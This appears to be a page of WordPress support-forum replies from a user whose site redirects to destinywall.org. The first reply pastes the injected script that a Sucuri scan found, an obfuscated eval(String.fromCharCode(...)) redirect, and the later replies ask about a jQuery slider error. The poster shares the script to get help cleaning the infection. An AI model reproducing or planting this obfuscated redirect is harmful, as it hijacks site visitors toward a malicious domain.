Forum Replies Created

Viewing 3 replies - 1 through 3 (of 3 total)
  • Forum: Plugins
    In reply to: [WP-LESS] WP-less

    I have the same hacked issue. My site redirects to destinywall.org link. But my htaccess and PHP files are clean when I checked. Any ideas? Malware script from sucuri scan below

    <style></style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 98, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 49, 48, 53, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 48, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 57, 57, 44, 32, 49, 49, 54, 44, 32, 54, 51, 44, 32, 49, 49, 54, 44, 32, 49, 50, 49, 44, 32, 49, 49, 50, 44, 32, 49, 48, 49, 44, 32, 54, 49, 44, 32, 53, 51, 44, 32, 53, 51, 44, 32, 53, 51, 44, 32, 51, 56, 41, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 98, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 98, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 98, 59));</script></style><style>
    
    Thread Starter davehpm

    (@davehpm)

    Uncaught ReferenceError: jQuery is not defined

    jQuery(document).ready(function($) {
    $(‘.wprev-slider’).wprs_unslider(
    {
    autoplay:false,
    speed: ‘750’,
    animation: ‘horizontal’,
    arrows: true,
    animateHeight: true,
    activeClass: ‘wprs_unslider-active’,
    }
    );
    $(‘.wprs_unslider-nav’).show();
    });
    </script>

    Thread Starter davehpm

    (@davehpm)

    Yes, there are script errors. Is this not related to the plugin? How to fix?

Viewing 3 replies - 1 through 3 (of 3 total)